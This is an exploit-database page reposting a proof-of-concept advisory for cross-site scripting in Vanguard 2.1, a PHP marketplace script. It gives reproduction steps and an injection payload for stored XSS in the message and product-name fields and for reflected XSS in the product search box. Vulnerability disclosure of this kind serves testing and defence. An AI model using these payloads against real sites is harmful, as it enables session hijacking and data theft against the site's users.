Advertisement






Vanguard 2.1 Cross Site Scripting

CVE Category Price Severity
CVE-2020-15339 CWE-79 Unavailable Medium
Author Risk Exploitation Type Date
Richard Jones High Remote 2020-04-07
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.00791 0.61166

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040032

Below is a copy:

Vanguard 2.1 Cross Site Scripting
# Exploit Title: Vanguard 2.1  Multi XSS Vunlerabilities
# Google Dork:N/A
# Date: 2020-04-04
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1
# Tested on: 5.4.0-4parrot1-amd64

---------------------------------------------------------


Summary:

Persistent Cross-site Scripting in message&product title-tags also there's Non-Persistent Cross-site scripting in product search box.

PoC 1:

A- Message

1- create an account on vanguard marketplace
2- go to send mail 
https://example/mails/new

In the "Object" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>
 
3-then choose the target (username ) then hit submit
4- now go to the mailbox and click on the msg 
https://example/mails/read/1

et voila xssed!

PoC 2:

B:Product

1-go to add new product 
2- In the "Product Name" field type my my preferred payload : "><img src=x onerror=prompt(document.domain);>
2- now view the product page
https://example/p/(id)
3 -click on download in the product page
https://example/download/(id)

et voila xssed!

PoC 3:

In Products Search box use payload:
"><img src=x onerror=prompt(document.domain);>


Impact:
XSS can lead to user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other critical  attacks on all users of the product .

Screentshoots:

A -https://imgur.com/jkCfaEh
B-https://imgur.com/3GuKGJr

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum